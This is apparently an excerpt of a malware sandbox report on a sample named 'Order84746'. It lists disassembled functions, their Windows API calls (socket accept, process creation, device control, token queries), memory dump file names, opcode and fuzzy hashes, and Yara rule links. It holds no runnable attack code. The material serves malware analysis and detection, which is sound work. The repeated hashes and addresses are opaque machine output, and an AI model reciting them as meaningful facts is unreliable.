                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 340655de86273bac525a07ff6640643479de339be020933259da49867a413044
                          • Instruction ID: d0d0512007978bb88d34ec866a9032ace48a8d631fc612bb6ddd6b01ce0bc3ce
                          • Opcode Fuzzy Hash: 340655de86273bac525a07ff6640643479de339be020933259da49867a413044
                          • Instruction Fuzzy Hash: A2119A31345111ABEB04AB29DC05FBE779DFF86320F148519F926C72E1CBA4AC008B91
                          Function 00938A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                          Download Yara Rule
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00938AE0
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00938AF2
                          • accept.WS2_32(00000000,00000000,00000000), ref: 00938AFF
                          • WSAGetLastError.WS2_32(00000000), ref: 00938B16
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLastacceptselect
                          • String ID:
                          • API String ID: 385091864-0
                          • Opcode ID: b80a481cdc24951047e8b10378c5628f1a1ffe2094254a8a1cfd6be5790c4d76
                          • Instruction ID: c2eb2ab6a24c5a63c2604c3abb8f7f906f7b7c493a35ad9c579508a323ae6e97
                          • Opcode Fuzzy Hash: b80a481cdc24951047e8b10378c5628f1a1ffe2094254a8a1cfd6be5790c4d76
                          • Instruction Fuzzy Hash: C321A572A001249FC7219F69DC85A9EBBFCEF4A310F00816AF949D7290DB74DA418FA1
                          Function 00920AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00921E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00920ABB,?,?,?,0092187A,00000000,000000EF,00000119,?,?), ref: 00921E77
                            • Part of subcall function 00921E68: lstrcpyW.KERNEL32(00000000,?,?,00920ABB,?,?,?,0092187A,00000000,000000EF,00000119,?,?,00000000), ref: 00921E9D
                            • Part of subcall function 00921E68: lstrcmpiW.KERNEL32(00000000,?,00920ABB,?,?,?,0092187A,00000000,000000EF,00000119,?,?), ref: 00921ECE
                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0092187A,00000000,000000EF,00000119,?,?,00000000), ref: 00920AD4
                          • lstrcpyW.KERNEL32(00000000,?,?,0092187A,00000000,000000EF,00000119,?,?,00000000), ref: 00920AFA
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0092187A,00000000,000000EF,00000119,?,?,00000000), ref: 00920B2E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: c53d2b29be16c1e3c1b7043af4544b08559c387d641a23e0363bc6b552980f0d
                          • Instruction ID: 64752039109594e606a9c2f77a9cf0fb443f858932a3b30868c1b875e925c60a
                          • Opcode Fuzzy Hash: c53d2b29be16c1e3c1b7043af4544b08559c387d641a23e0363bc6b552980f0d
                          • Instruction Fuzzy Hash: A911E636600315AFDF25AF34EC05E7A77A8FF89354B80406AF906CB255EB719850D7A1
                          Function 00912F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00912FB5
                            • Part of subcall function 0090395C: __FF_MSGBANNER.LIBCMT ref: 00903973
                            • Part of subcall function 0090395C: __NMSG_WRITE.LIBCMT ref: 0090397A
                            • Part of subcall function 0090395C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001), ref: 0090399F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: abed9df712548ee620b190b011c1d37b914660d29e83a9c6044e31d647bbc627
                          • Instruction ID: cde8b0dd3b552c9dda6c8a08876cee60a1e6db485521fe02173022ad8bd9f90a
                          • Opcode Fuzzy Hash: abed9df712548ee620b190b011c1d37b914660d29e83a9c6044e31d647bbc627
                          • Instruction Fuzzy Hash: EC11CD31B09219AFDB313FB0AC0579A7BE8AF84370F208919F85996391DB74C99196D0
                          Function 008FEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 008FEBB2
                            • Part of subcall function 008E51AF: _memset.LIBCMT ref: 008E522F
                            • Part of subcall function 008E51AF: _wcscpy.LIBCMT ref: 008E5283
                            • Part of subcall function 008E51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E5293
                          • KillTimer.USER32(?,00000001,?,?), ref: 008FEC07
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008FEC16
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00953C88
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                          • String ID:
                          • API String ID: 1378193009-0
                          • Opcode ID: 6f6f904cf5704ac2f840bda0e92610e39c111acc51222593c270c0ab769d46e4
                          • Instruction ID: 928c6b087b8c37a77ac8e6e4aa6d608dad6580bdefe08a1225146da60d3cd85f
                          • Opcode Fuzzy Hash: 6f6f904cf5704ac2f840bda0e92610e39c111acc51222593c270c0ab769d46e4
                          • Instruction Fuzzy Hash: AE21DA709087949FE732DB38C855BE7BBECEB05309F04048DEB9A96291C7B42A848B51
                          Function 0092058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009205AC
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009205C7
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009205DD
                          • FreeLibrary.KERNEL32(?), ref: 00920632
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                          • String ID:
                          • API String ID: 3137044355-0
                          • Opcode ID: 9b54adc9f851c0392f98e1d26e56be3cf5e1f1d786b39592762c0f148fc589f8
                          • Instruction ID: 1ab933596ad5b3f514f8fa1798db351936160657f9c87ce04104ea7baf36126f
                          • Opcode Fuzzy Hash: 9b54adc9f851c0392f98e1d26e56be3cf5e1f1d786b39592762c0f148fc589f8
                          • Instruction Fuzzy Hash: 2421B471A00228EFDB20CF91EC88ADABBBCEFC0700F00856DE51692055D7B5EA58EF50
                          Function 00926713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00926733
                          • _memset.LIBCMT ref: 00926754
                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009267A6
                          • CloseHandle.KERNEL32(00000000), ref: 009267AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle_memset
                          • String ID:
                          • API String ID: 1157408455-0
                          • Opcode ID: 45a1b40d8cfbee0c67f502cf75b857ddc819c6463ec48cfd8e9749603c5f8bdb
                          • Instruction ID: 2f2661362930ba321d548550fed570655be72f4e919958a21344150e4d33a1cf
                          • Opcode Fuzzy Hash: 45a1b40d8cfbee0c67f502cf75b857ddc819c6463ec48cfd8e9749603c5f8bdb
                          • Instruction Fuzzy Hash: 0411A776D012287AE72057A5AC4DFAFBABCEF44764F10419AF514E71D0D2744E848BB4
                          Function 0091B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0091AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0091AA79
                            • Part of subcall function 0091AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0091AA83
                            • Part of subcall function 0091AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0091AA92
                            • Part of subcall function 0091AA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0091AA99
                            • Part of subcall function 0091AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0091AAAF
                          • GetLengthSid.ADVAPI32(?,00000000,0091ADE4,?,?), ref: 0091B21B
                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0091B227
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091B22E
                          • CopySid.ADVAPI32(?,00000000,?), ref: 0091B247
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                          • String ID:
                          • API String ID: 259861997-0
                          • Opcode ID: 883602b3617f0a78bc3a462211fb704f3ad0ab0edbdc97fe994bb04d8b2ee7c5
                          • Instruction ID: 6e1a175dba2de270b26753453e8d0a1df6e1bdd3d8b04fbed6e71dfcd7b8f19d
                          • Opcode Fuzzy Hash: 883602b3617f0a78bc3a462211fb704f3ad0ab0edbdc97fe994bb04d8b2ee7c5
                          • Instruction Fuzzy Hash: 9511BF71B01209AFCB049F94DD84AEEB7AEEF95304F14842DE95297210D771AE88DB10
                          Function 0091B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0091B498
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0091B4AA
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0091B4C0
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0091B4DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: ba189d2a739d2c89a4598577ce066d19a9e43647f737ed8e9832692873cb539c
                          • Instruction ID: 841ceb7d3ab2a39109f34e426d7138830e92f2ad7f4a5e63b96ff034e471cee6
                          • Opcode Fuzzy Hash: ba189d2a739d2c89a4598577ce066d19a9e43647f737ed8e9832692873cb539c
                          • Instruction Fuzzy Hash: 69114C7AA00218FFDB11DF99C981EDDBBB9FB08700F204095E604B7290D771AE50DB94
                          Function 0092732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00927352
                          • MessageBoxW.USER32(?,?,?,?), ref: 00927385
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0092739B
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009273A2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          • API String ID: 2880819207-0
                          • Opcode ID: 54b1e0ed5d997851ed97058027068f2c738bcb60a9e5fe388cd77858b94b91ff
                          • Instruction ID: 6dae75c0d0f0b3a891c4253110204ad9cbf42ab9ba1848d17412182159d03d30
                          • Opcode Fuzzy Hash: 54b1e0ed5d997851ed97058027068f2c738bcb60a9e5fe388cd77858b94b91ff
                          • Instruction Fuzzy Hash: D911E572A1C214AFC701DBA8EC05B9EBBAD9F45310F044219FC31E3291D6B08910A7E0
                          Function 008FD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                          Download Yara Rule
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008FD1BA
                          • GetStockObject.GDI32(00000011), ref: 008FD1CE
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 008FD1D8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          • Opcode ID: 221a8280c8924061b9f2e45aa7d0924208d89986ec1cc80c5254f1852648d2ff
                          • Instruction ID: ac858ef5e5b259db3e100ca0c1f30c91d4e69875e1c4481bc9698a86246695a2
                          • Opcode Fuzzy Hash: 221a8280c8924061b9f2e45aa7d0924208d89986ec1cc80c5254f1852648d2ff
                          • Instruction Fuzzy Hash: B311A1B250560DBFEF014FA0DC50EFABB6AFF093A4F040116FB1492050C7729DA0ABA0
                          Function 00914DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                          • Instruction ID: f929a64cc352847245b7a6b3c2128a9f7a389374ac6ca46a479e19285c7e656b
                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                          • Instruction Fuzzy Hash: 1401483620014EFBCF125E88DC068EE3F27BB5C351B598555FA2899031D336CAB2AB81
                          Function 00907452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00907A0D: __getptd_noexit.LIBCMT ref: 00907A0E
                          • __lock.LIBCMT ref: 0090748F
                          • InterlockedDecrement.KERNEL32(?), ref: 009074AC
                          • _free.LIBCMT ref: 009074BF
                          • InterlockedIncrement.KERNEL32(00FE1A30), ref: 009074D7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                          • String ID:
                          • API String ID: 2704283638-0
                          • Opcode ID: 20453b26a343d39114e2eec9121400ef1c2a4710932f9a25dec523b987dd4d61
                          • Instruction ID: 9795c87c79b3ab6c885c2bbd2f30eaf67451358284bbf624310efdfa9144fb0b
                          • Opcode Fuzzy Hash: 20453b26a343d39114e2eec9121400ef1c2a4710932f9a25dec523b987dd4d61
                          • Instruction Fuzzy Hash: 5F018E32E0A621EFD761AFA9940675DFB65AF84721F154009F414676E0C7247950DFC2
                          Function 00907A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __lock.LIBCMT ref: 00907AD8
                            • Part of subcall function 00907CF4: __mtinitlocknum.LIBCMT ref: 00907D06
                            • Part of subcall function 00907CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00907D1F
                          • InterlockedIncrement.KERNEL32(?), ref: 00907AE5
                          • __lock.LIBCMT ref: 00907AF9
                          • ___addlocaleref.LIBCMT ref: 00907B17
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                          • String ID:
                          • API String ID: 1687444384-0
                          • Opcode ID: 1ea32ffed73ce25c0e331e434176e6dd72cf2f9fccdbfeb4d40b1fc3360fa34d
                          • Instruction ID: 825fcedb0cf4fb3183b1572849022b8cf1ce19ebb51e994aae7bb7559065c7ac
                          • Opcode Fuzzy Hash: 1ea32ffed73ce25c0e331e434176e6dd72cf2f9fccdbfeb4d40b1fc3360fa34d
                          • Instruction Fuzzy Hash: E9015B71904B009EE7309FA9C90574AF7F0EF80325F20890EA49A962E0CBB0A680CB51
                          Function 0094E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0094E33D
                          • _memset.LIBCMT ref: 0094E34C
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009A3D00,009A3D44), ref: 0094E37B
                          • CloseHandle.KERNEL32 ref: 0094E38D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3277943733-0
                          • Opcode ID: 1e2a149f0f33613187629699c6913098e2a0c66629000b01543ed3ba69f71708
                          • Instruction ID: b5670a7c911b381f572c538c1fe91db1f86376865e14424de53e78ff4f001e31
                          • Opcode Fuzzy Hash: 1e2a149f0f33613187629699c6913098e2a0c66629000b01543ed3ba69f71708
                          • Instruction Fuzzy Hash: 46F03AB1A64304BEE3101B61AC46F777E9CDB06B54F008421FE0AD61E2D3759E00A6F8
